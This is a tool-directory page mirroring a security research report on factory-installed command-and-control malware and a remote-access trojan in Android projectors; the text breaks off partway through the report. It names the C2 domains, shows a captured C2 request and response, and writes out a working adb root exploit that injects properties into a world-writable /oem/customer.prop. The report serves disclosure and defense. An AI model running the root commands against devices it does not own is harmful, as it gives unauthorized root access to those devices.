Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Android-Projector-C2-Malware — 对中国Beamer的C2网络的剖析 - SilentSDK-Analysis | Kitploit
工具/GitHubGitHub/kavan00/android-projector-c2-malware
Android安全嵌入式系统安全危害指标 (IOC) 管理物联网安全网络取证逆向工程恶意软件分析数字取证命令与控制威胁情报供应链安全固件分析
182665个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubkavan00/android-projector-c2-malware

Android-Projector-C2-Malware

对中国Beamer的C2网络的剖析 - SilentSDK-Analysis

查看仓库

Pre-installed C2 Infrastructure and RAT Payload on Android Projectors

Technical Analysis Report — Security Research


Affected Devices: Multiple Android projectors of beamer brands like the Nonete (e.g., Model HY260Pro) (likely also several projectors from Magcubic, Hotack, Huyukang and many more, as these companies distribute similar models and there are indications supporting this)
Chipset Platform: Allwinner H713 / sun50iw12p1 — potentially affects all devices on this platform
Analysis Period: April 11–17, 2026
Classification: Pre-installed Command-and-Control infrastructure with Remote Access Trojan payload


TL;DR

  • The Problem: Numerous cheap Android projectors (potentially brands like Magcubic, Hotack, etc., utilizing the Allwinner H713 chip), currently sold in massive quantities on Amazon, eBay, and AliExpress, are infected with malware straight from the factory (Supply Chain Attack, similar to the "BADBOX" cases).
  • The Mechanism: A seemingly harmless system app ("StoreOS") acts as a disguised dropper. It completely silently downloads a Stage-2-Dropper named "SilentSDK" in the background and installs it with maximum system privileges, which in turn installs a modular, plugin-based, architechture aware RAT & possibly phishing framework.
  • The Danger: The malware establishes a C2 connection to China (api.pixelpioneerss.com), extracts sensitive device IDs, and can download and execute arbitrary additional malicious code with root privileges at any time (chmod 777). Additionally, the devices feature open root backdoors.
  • Immediate Mitigation: The C2 domains (especially *.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) must be blocked at the network level. Affected users can only disable the malicious apps manually via ADB, as they are deeply embedded in the system.

Urgency Notice

The malware infrastructure documented in this report is pre-installed on Android projectors currently being sold in large quantities to end consumers on Amazon, eBay, and AliExpress. The affected devices span possibly multiple brand names (Hotack, Huyukang, Magcubic, Nonete, among others). Identical C2 infrastructure has been independently confirmed on other devices from the same manufacturer (see Section 13). The pattern matches the BADBOX cases.


Table of Contents

  1. Device Identification
  2. Investigation Workflow
  3. Root Access — Exploit Path
  4. C2 Server Response — Core Evidence
  5. Malware Ecosystem Overview
  6. StoreOS — Dropper Analysis (com.htc.storeos)
  7. EventUploadService — Telemetry (com.htc.eventuploadservice)
  8. ExpandSDK — Ad-Injection (com.htc.expandsdk)
  9. SilentSDK — Stage-2-Dropper Analysis (com.hotack.silentsdk)
  10. The Malware
  11. System Backdoors
  12. Network Forensics
  13. Device Spoofing (Build-Fingerprint Spoofing)
  14. External Confirmation
  15. Indicators of Compromise (IOCs)
  16. MITRE ATT&CK Mapping
  17. Immediate Mitigations
  18. Sources

Purchased Device: Amazon Link - Nonete Mini Beamer 4K 1080P


1. Device Identification

PropertyValue
Brand NameNonete HY260Pro (model sold by multiple companies)
Internal Model NameNT10
SoCAllwinner sun50iw12p1 (ARM 32-bit)
Operating SystemSpectraOS (Android 11, Kernel 5.4.99)
Real Build FingerprintAllwinner/h713_tuna_p3/h713-tuna_p3:11
Spoofed Build FingerprintADT-3/adt3/adt3:11/RP1A.201005.006
SELinuxPermissive (no enforcement)
Platform Signing KeyPublic AOSP Test Key
OEM CertificateCN=蓝鲨, OU=www.bsh.me, C=CN
Firmware ChannelHY260Pro_SpectraOS_TPYB

Note on scope: The Allwinner H713 chipset is built into numerous cheap Android projectors sold under changing brand names in the European market. The identical firmware base (h713_tuna_p3) and identical C2 operator (Shenzhen Aodin Technology) strongly suggest that all devices from this OEM contain the same infrastructure.


2. Investigation Workflow

StepActionResult
1Wireshark capture of network trafficHTTP traffic to store-api.aodintech.com
2Decoding of the gzip-compressed C2 response7 apps, including hidden "SilentTools"
3AES-CBC decryption of the download pathKey [REDACTED], URL to .bpp file
4Root exploit via /oem/customer.propuid=0(root) after property injection
5Forensic dump of /data, /oem, /systemAPKs, databases, configurations
6Static analysis of StoreOS DEXpm install -r -d, byte-reversal protection
7Reverse engineering the reverseLen mechanismUnderstanding of the anti-analysis protection
8Breaking the byte-reversal protectionDecrypted, analyzable SilentSDK DEX
9XOR decryption of SilentSDK stringsC2 domain api.pixelpioneerss.com confirmed
10Hash verification across three sourcesMD5/SHA-256 match perfectly
11Reverse engineering the malware download processServers still online
12Reverse engineering the malwarePlugin-based Rat Framework

3. Root Access — Exploit Path

Root access was achieved through a combination of three vulnerabilities:

  1. SELinux Permissive — Access violations are only logged, not blocked.
  2. World-writable /oem — The partition is mounted as FAT with fmask=0000.
  3. customer.prop loaded at boot — Overwrites system properties.```bash adb shell getenforce # Result: Permissive adb shell ls -la /oem/ # All files world-writable

adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'

adb reboot && adb wait-for-device && adb root adb shell id

uid=0(root) gid=0(root) context=u:r:su:s0

**影响:** 任何拥有物理访问权限的用户或同一网络上的攻击者(通过ADB,端口5555开放,无身份验证)均可获取完全 root 访问权限。

---

## 4. C2 服务器响应 — 核心证据

### 捕获的 HTTP 请求```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12

服务器响应(从pcapng解码 - 表格)

gzip压缩的响应包含一个包含七个应用的JSON列表。其中六个是常规流媒体应用(YouTube、Netflix、迪士尼+、Prime Video、Chrome、BrowseHere)。第七个是SilentTools:

AppPackageisShowisForceisSilent InstallisSilent Uninstalllaunch Type
YouTubecom.google.android.youtube.tvtruefalsefalsefalse0
Disney+com.disney.disneyplustruefalsefalsefalse0
Netflixcom.netflix.mediaclienttruefalsefalsefalse0
Chromecom.android.chrometruefalsefalsefalse0
Prime Videocom.amazon.amazonvideo.livingroomtruefalsefalsefalse0
BrowseHerecom.tcl.browsertruefalsefalsefalse0
SilentToolscom.hotack.silentsdkfalsetruefalsetrue1
下载工具